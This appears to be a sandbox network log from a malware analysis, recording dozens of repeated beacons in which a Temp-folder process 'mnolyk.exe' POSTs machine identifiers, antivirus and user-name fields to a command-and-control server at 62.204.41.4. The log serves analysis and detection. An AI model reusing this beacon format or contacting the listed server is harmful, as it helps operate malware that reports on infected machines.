Feb 7, 2023 20:01:39.857997894 CET	313	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:39.921566963 CET	314	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
181	192.168.2.6	49903	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:40.097750902 CET	314	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:40.163037062 CET	315	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
182	192.168.2.6	49904	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:40.346550941 CET	315	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:40.410402060 CET	316	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
183	192.168.2.6	49905	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:40.596380949 CET	316	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:40.660595894 CET	317	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
184	192.168.2.6	49906	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:40.847690105 CET	317	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:40.911724091 CET	318	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
185	192.168.2.6	49907	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:41.092787027 CET	318	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:41.156471968 CET	319	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
186	192.168.2.6	49908	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:41.349766970 CET	319	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:41.413944960 CET	320	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
187	192.168.2.6	49909	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:41.612708092 CET	320	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:41.676428080 CET	321	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
188	192.168.2.6	49910	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:41.844449043 CET	321	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:41.908976078 CET	322	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
189	192.168.2.6	49911	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:42.093950033 CET	323	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:42.158803940 CET	323	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.6	49737	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:55.466121912 CET	124	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:55.530755043 CET	124	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
190	192.168.2.6	49912	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:42.328219891 CET	324	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:42.390405893 CET	324	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
191	192.168.2.6	49913	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:42.565043926 CET	325	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:42.628570080 CET	325	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
192	192.168.2.6	49914	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:42.801956892 CET	326	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:42.866264105 CET	326	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
193	192.168.2.6	49915	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:43.056278944 CET	326	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:43.119924068 CET	327	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
194	192.168.2.6	49916	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:43.294682980 CET	328	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:43.357547045 CET	328	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
195	192.168.2.6	49917	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:43.562458038 CET	329	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:43.626914024 CET	329	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
196	192.168.2.6	49918	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:43.801203966 CET	330	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:43.862857103 CET	330	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
197	192.168.2.6	49919	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:44.090733051 CET	331	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:44.158763885 CET	331	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
198	192.168.2.6	49920	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:44.690558910 CET	332	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:44.752736092 CET	332	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
199	192.168.2.6	49921	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:45.051140070 CET	333	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:45.115705013 CET	333	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49720	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:51.202652931 CET	24	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
